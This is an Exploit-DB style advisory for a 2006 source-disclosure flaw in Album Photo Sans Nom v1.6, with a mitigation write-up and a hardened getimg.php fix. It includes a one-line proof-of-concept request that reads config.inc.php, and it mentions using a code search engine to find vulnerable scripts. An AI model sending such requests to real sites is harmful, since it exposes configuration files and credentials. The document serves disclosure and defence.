Vendor: Album Photo Sans Nom
By: DarkFig
CVSS: 7.5 (HIGH)
CWE-98: File Inclusion
Product Name: Album Photo Sans Nom
Affected Version From: Album Photo Sans Nom v1.6
Affected Version To: Album Photo Sans Nom v1.6
Patch Exists: NO
Related CWE: N/A
CPE: a:bezut:album_photo_sans_nom:1.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2006

7 php scripts File Inclusion Vuln / Source disclosure

Album Photo Sans Nom v1.6 passes the user-controlled 'img' parameter of 'getimg.php' straight to readfile() (line 47: readfile($_GET['img']);) with no validation. readfile() writes the raw bytes of whatever path it is given to the response, so a request such as getimg.php?img=config.inc.php returns the PHP source of config.inc.php instead of an image; the advisory uses exactly that file as its proof of concept. Any other file the web server process can read is exposed the same way, since nothing restricts the value to the album's image directory. Because readfile() only reads, the target is never executed as PHP: this is an arbitrary file read / source disclosure rather than a code-executing include, despite the "File Inclusion" label.

Mitigation:

Never pass a user-supplied path to readfile() (or include/require). Accept only a bare file name, strip any directory component with basename(), allow only expected image extensions, resolve the result with realpath() and serve it only if the resolved path is a regular file located inside the intended image directory; reject everything else with a 403/404. Serve the file with an image Content-Type so a browser never renders it as a page.
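The following is an added example of the fix described above; it is not code from the original APSN 1.6 release. Only the readfile($_GET['img']) call is taken from the advisory; the images/ directory name, the extension list and the overall shape of getimg.php are assumptions.

```php
<?php
// Hardened replacement for the vulnerable getimg.php pattern (example code, not the
// project's own). Assumed: album images live in ./images next to this script.

// Original vulnerable line (from the advisory), shown for contrast:
//   readfile($_GET['img']);   // ?img=config.inc.php dumps that file's source

define('IMG_DIR', __DIR__ . '/images');          // assumption: image directory
const ALLOWED_TYPES = [                          // extension -> MIME type allowlist
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Map a user-supplied value to a safe absolute path under $baseDir, or null.
 */
function resolve_image(string $requested, string $baseDir): ?array
{
    // PHP 8 filesystem functions throw on embedded NUL bytes; reject them up front.
    if (strpos($requested, "\0") !== false) {
        return null;
    }

    // Keep only the file name: "../", absolute paths and drive letters are dropped.
    $name = basename($requested);
    if ($name === '' || $name[0] === '.') {      // also blocks dotfiles such as .htaccess
        return null;
    }

    // Extension allowlist, compared case-insensitively.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return null;
    }

    // Resolve both paths and require the file to sit directly under the image directory.
    // realpath() follows symlinks, so a link pointing outside the directory is caught here.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    if (!is_file($path)) {
        return null;
    }

    return ['path' => $path, 'mime' => ALLOWED_TYPES[$ext]];
}

$img = resolve_image($_GET['img'] ?? '', IMG_DIR);
if ($img === null) {
    http_response_code(404);
    exit;
}

// Always send an image Content-Type; never let the client sniff PHP source as HTML.
header('Content-Type: ' . $img['mime']);
header('X-Content-Type-Options: nosniff');
header('Content-Length: ' . (string) filesize($img['path']));
readfile($img['path']);
```

With this in place, getimg.php?img=config.inc.php fails the extension check and gets a 404, and getimg.php?img=../config.inc.php is reduced by basename() to config.inc.php and fails the same way; only files that actually exist in images/ with an allowed extension are ever handed to readfile().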

Exploit-DB raw data:

#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# A few examples of what we can do with a code search engine
# For educational purposes only.
#
# You can use regex in your searches; this can be chaotic.
# What's your opinion of the Google Code Search project?
#

# Affected.scr: Album Photo Sans Nom v1.6
# Download....: http://scripts.bezut.info/releases/APSN/albumV1.6.tgz
# Poc.........: http://victim.pl/getimg.php?img=config.inc.php
# Vuln.code...: Line 47, readfile($_GET['img']);

# milw0rm.com [2006-10-10]